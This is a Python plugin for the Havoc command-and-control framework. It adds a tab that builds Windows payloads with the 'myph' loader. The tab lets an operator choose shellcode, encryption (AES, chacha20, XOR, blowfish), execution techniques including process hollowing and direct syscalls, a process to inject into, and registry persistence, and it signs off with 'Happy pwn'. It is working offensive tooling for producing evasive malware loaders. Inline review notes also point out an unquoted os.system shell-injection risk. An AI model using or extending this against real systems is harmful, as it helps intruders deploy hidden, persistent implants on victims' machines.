#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
# Author: @jenaye_fr & @djnn1337
# Created on: Mon, 17. Nov 2023
# Description: matro7sh myph Loader support for Havoc C2 framework
# Usage: Load this script into Havoc: Scripts -> Scripts Manager -> Load to create matro7sh Tab
import os
import shutil
import havoc # type: ignore
import havocui # type: ignore
from datetime import datetime
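# Configuration
MYPH_LOADER_PATH = shutil.which("myph")  # None when the loader is not on $PATH
MYPH_EXEC_TECHNIQUES = ["CRT", "CRTx", "CreateFiber", "ProcessHollowing", "CreateThread", "EnumCalendarInfoA", "Syscall", "Etwp"]
MYPH_ENCRYPT_TECHNIQUES = ["AES", "chacha20", "XOR", "blowfish"]
# Variables & Defaults — module globals that the dialog callbacks below overwrite
myph_shellcode_path = ""
myph_shellcode_encryption_key = ""
myph_shellcode_encryption_kind = "AES"
myph_target_process = "cmd.exe"
myph_shellcode_execution_technique = "CRT"
myph_output_path = "/tmp/myph.exe"  # replaced by the save-file dialog at build time
myph_persistence_reg_name = ""
# Colors
HAVOC_ERROR = "#ff5555" # Red
HAVOC_SUCCESS = "#50fa7b" # Green
HAVOC_COMMENT = "#6272a4" # Greyish blue
HAVOC_DARK = "#555766" # Dark Grey
HAVOC_INFO = "#8be9fd" # Cyan
HAVOC_WARNING = "#ffb86c" # Orange
# Labels — current text of the two labels that get swapped via dialog.replaceLabel()
myph_label_to_replace = f"<b style=\"color:{HAVOC_ERROR};\">No shellcode selected.</b>"
myph_label_execution_technique = ""
if not MYPH_LOADER_PATH:
    print("[-] Loader not found in $PATH")
    print("Please run script located in install/ directory :)")
    # shutil.which() returned None here, so there is no path to display; give the
    # message box a real body instead of passing None as its text (the messagebox
    # call elsewhere in this file takes (title, text)).
    havocui.messagebox("Loader not found", "myph was not found in $PATH")
# Create dialog and log widget
dialog = havocui.Dialog("Matro7sh Myph Payload Generator", True, 670, 400)
log = havocui.Logger("matro7sh myph Log")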
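def myph_change_shellcode_exec_method(num):
    """Combobox callback: record the chosen execution technique and refresh its warning label.

    Args:
        num: index into MYPH_EXEC_TECHNIQUES reported by the combobox; a falsy
            index selects the default "CRT" (which is also MYPH_EXEC_TECHNIQUES[0]).

    Updates the module globals ``myph_shellcode_execution_technique`` and
    ``myph_label_execution_technique`` and swaps the label shown in ``dialog``.
    """
    global myph_shellcode_execution_technique
    global myph_label_execution_technique
    myph_shellcode_execution_technique = MYPH_EXEC_TECHNIQUES[num] if num else "CRT"
    print("[*] Shellcode execution method changed: ", myph_shellcode_execution_technique)
    warn_label = f"<b style=\"color:{HAVOC_WARNING};\">This method will not use the Process To Inject setting.</b>"
    # Techniques that do not use the "process to inject" setting get the warning;
    # every other technique gets an empty label. A set replaces the original dict,
    # which listed "CreateThread" twice and would KeyError on an unknown name.
    techniques_to_warn = {"CreateThread", "CreateFiber", "EnumCalendarInfoA", "Etwp", "Syscall"}
    new_label = warn_label if myph_shellcode_execution_technique in techniques_to_warn else ""
    dialog.replaceLabel(myph_label_execution_technique, new_label)
    myph_label_execution_technique = new_label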
def myph_change_target_process(p):
    """Line-edit callback: remember *p* as the process name later passed to the loader via --process."""
    global myph_target_process
    chosen = p
    myph_target_process = chosen
    print("[*] Target process: ", chosen)
def myph_change_default_key(k):
    """Line-edit callback: remember *k* as the encryption key later passed to the loader via --key."""
    global myph_shellcode_encryption_key
    new_key = k
    myph_shellcode_encryption_key = new_key
    print("[*] Key changed: ", new_key)
def myph_change_shellcode_encrypt_method(num):
    """Combobox callback: record the chosen encryption algorithm.

    Args:
        num: index into MYPH_ENCRYPT_TECHNIQUES reported by the combobox; a falsy
            index selects the default "AES".
    """
    global myph_shellcode_encryption_kind
    selected = MYPH_ENCRYPT_TECHNIQUES[num] if num else "AES"
    myph_shellcode_encryption_kind = selected
    print("[*] Shellcode encryption method changed: ", selected)
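def myph_change_persistence_reg_setting(reg):
    """Line-edit callback: store the name passed to --persistence; an empty value clears it.

    Args:
        reg: the value typed into the line edit; any falsy value is stored as "".
    """
    global myph_persistence_reg_name
    myph_persistence_reg_name = reg or ""
    if myph_persistence_reg_name:
        print(f"[*] Enabled registry persistence (payload name: {reg})")
    else:
        # The original printed "Enabled ..." even when the setting was being cleared.
        print("[*] Registry persistence disabled")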
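def myph_change_shellcode_path():
    """Button callback: let the operator pick the shellcode file and refresh the path label.

    Updates the module globals ``myph_shellcode_path`` and ``myph_label_to_replace``
    and swaps the label shown in ``dialog``.
    """
    global myph_shellcode_path
    global myph_label_to_replace
    # The file dialog returns bytes; decode as UTF-8 so a path with non-ASCII
    # characters does not raise UnicodeDecodeError (the original used "ascii").
    myph_shellcode_path = havocui.openfiledialog("Shellcode path").decode("utf-8")
    print("[*] Shellcode path changed: ", myph_shellcode_path, ".")
    formatted_shellcode_path = f"<span style=\"color:{HAVOC_SUCCESS};\">{myph_shellcode_path}</span>"
    # An empty result (dialog cancelled) restores the "no shellcode" label. The
    # original compared against a single space (" "), so the error label never
    # came back; it also swapped the label before deciding which text to keep,
    # leaving the stored label out of sync with what the dialog displayed.
    if myph_shellcode_path:
        new_label = formatted_shellcode_path
    else:
        new_label = f"<b style=\"color:{HAVOC_ERROR};\">No shellcode selected.</b>"
    dialog.replaceLabel(myph_label_to_replace, new_label)
    myph_label_to_replace = new_label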
# Generate payload
def myph_run():
    """Button callback for "Generate": validate the shellcode path, then build and run the myph command.

    Reads the module globals set by the other dialog callbacks, overwrites
    ``myph_output_path`` from a save-file dialog, writes progress to ``log`` and
    closes ``dialog`` when done. Returns early (without closing the dialog) when
    no shellcode path has been chosen.
    """
    def get_build_command() -> str:
        """Ask for the output path, then assemble the myph command line from the module globals.

        Returns:
            The command string: the loader path followed by one ``--flag value``
            pair per non-empty setting, with ``--out`` always appended last.
        """
        global myph_shellcode_path
        global myph_shellcode_encryption_key
        global myph_shellcode_execution_technique
        global myph_target_process
        global myph_shellcode_encryption_kind
        global myph_output_path
        global myph_persistence_reg_name
        # The save dialog returns bytes; an "ascii" decode raises on non-ASCII paths.
        myph_output_path = havocui.savefiledialog("Output Path").decode("ascii")
        print("[*] Output Path changed: ", myph_output_path, ".")
        base_cmd = f'{MYPH_LOADER_PATH}'
        # NOTE(review): every value is interpolated unquoted into a single shell
        # string that os.system() runs in execute(); a path or key containing
        # spaces or shell metacharacters will break the command or be
        # reinterpreted by the shell. Building an argument list and calling
        # subprocess.run(args) (shell=False) would avoid that.
        if myph_shellcode_path != "":
            base_cmd = f'{base_cmd} --shellcode {myph_shellcode_path}'
        if myph_shellcode_encryption_kind != "":
            base_cmd = f'{base_cmd} --encryption {myph_shellcode_encryption_kind}'
        if myph_shellcode_encryption_key != "":
            base_cmd = f'{base_cmd} --key {myph_shellcode_encryption_key}'
        if myph_target_process != "":
            base_cmd = f'{base_cmd} --process {myph_target_process}'
        if myph_shellcode_execution_technique != "":
            base_cmd = f'{base_cmd} --technique {myph_shellcode_execution_technique}'
        if myph_persistence_reg_name != "":
            base_cmd = f'{base_cmd} --persistence {myph_persistence_reg_name}'
        base_cmd = f'{base_cmd} --out {myph_output_path}'
        # NOTE(review): this echoes the encryption key to the client console.
        print(f"[+] Command to be run: {base_cmd}")
        return base_cmd
    def execute():
        """Log the key setting, run the build command and report completion to the log widget."""
        if myph_shellcode_encryption_key == "":
            # NOTE(review): both messages say "AES key" regardless of the selected
            # encryption kind.
            log.addText(f"[<span style=\"color:{HAVOC_INFO};\">*</span>] No AES key provide it will be random one.")
        else:
            log.addText(f"[<span style=\"color:{HAVOC_INFO};\">*</span>] AES key provided = {myph_shellcode_encryption_key}.")
        cmd = get_build_command()
        # NOTE(review): the exit status of os.system() is discarded, so the
        # "generated successfully" line below is logged even when myph fails;
        # checking the return value before reporting success would be more honest.
        os.system(cmd)
        # Create Log
        log.addText(f"Command has been be executed")
        log.addText(f"Check client log to see the output")
        log.addText(
            f"<b style=\"color:{HAVOC_SUCCESS};\">Payload generated successfully at {myph_output_path} using myph loader. Happy pwn</b>")
    log.setBottomTab()
    log.setBottomTab()  # NOTE(review): duplicate of the line above; presumably harmless
    log.addText(
        f"<b style=\"color:{HAVOC_DARK};\">───────────────────────────────────────── running myph ─────────────────────────────────────────</b>")
    log.addText(f"<b style=\"color:{HAVOC_COMMENT};\">{datetime.now().strftime('%d/%m/%Y %H:%M:%S')} </b>")
    global myph_shellcode_path
    # Guard: refuse to build without a shellcode file (the dialog stays open).
    if myph_shellcode_path == "":
        havocui.messagebox("Error", "Please specify a valid shellcode path.")
        log.addText(f"[<span style=\"color:{HAVOC_ERROR};\">-</span>] No shellcode file specified.")
        return
    execute()
    dialog.close()
def myph_loader_generator():
    """Tab handler registered with havocui.createtab(): (re)build the myph dialog and run it."""
    def build():
        """Clear ``dialog``, add the widgets in display order, then show the dialog."""
        dialog.clear()
        # Get Listeners
        global listeners
        listeners = havoc.GetListeners()  # NOTE(review): assigned but not read anywhere in this file
        # Build Dialog — each combobox/line-edit is wired to the module-level
        # callback that stores its value in the corresponding global.
        dialog.addLabel(f"<b>──────────────────────────── Required Settings for Myph ─────────────────────────────</b>")
        dialog.addButton("Choose shellcode", myph_change_shellcode_path)
        dialog.addLabel(myph_label_to_replace)
        dialog.addLabel("<b>[*] Shellcode execution method</b>")
        dialog.addCombobox(myph_change_shellcode_exec_method, *MYPH_EXEC_TECHNIQUES)
        dialog.addLabel(myph_label_execution_technique)
        dialog.addLabel("<b>[*] Shellcode encryption method</b>")
        dialog.addCombobox(myph_change_shellcode_encrypt_method, *MYPH_ENCRYPT_TECHNIQUES)
        dialog.addLabel("<b>[*] Encryption key (Default: random)</b>")
        dialog.addLineedit("e.g. 0123456789ABCDEF1123345611111111", myph_change_default_key)
        dialog.addLabel("<b>[*] Process to inject to (Default: cmd.exe)</b>")
        dialog.addLineedit("e.g. teams.exe", myph_change_target_process)
        dialog.addLabel("<b>[*] Binary name for Registry Key persistence")  # NOTE(review): missing closing </b>
        dialog.addLineedit("leave empty if you dont want to use persistence from Myph", myph_persistence_reg_name)
        dialog.addButton("Generate", myph_run)
        dialog.exec()
    build()
# Create Tab — registers myph_loader_generator as the handler for the "Matro7sh myph" tab
# (when havocui invokes the handler is up to the framework; not visible here).
havocui.createtab("Matro7sh myph", "myph loader", myph_loader_generator)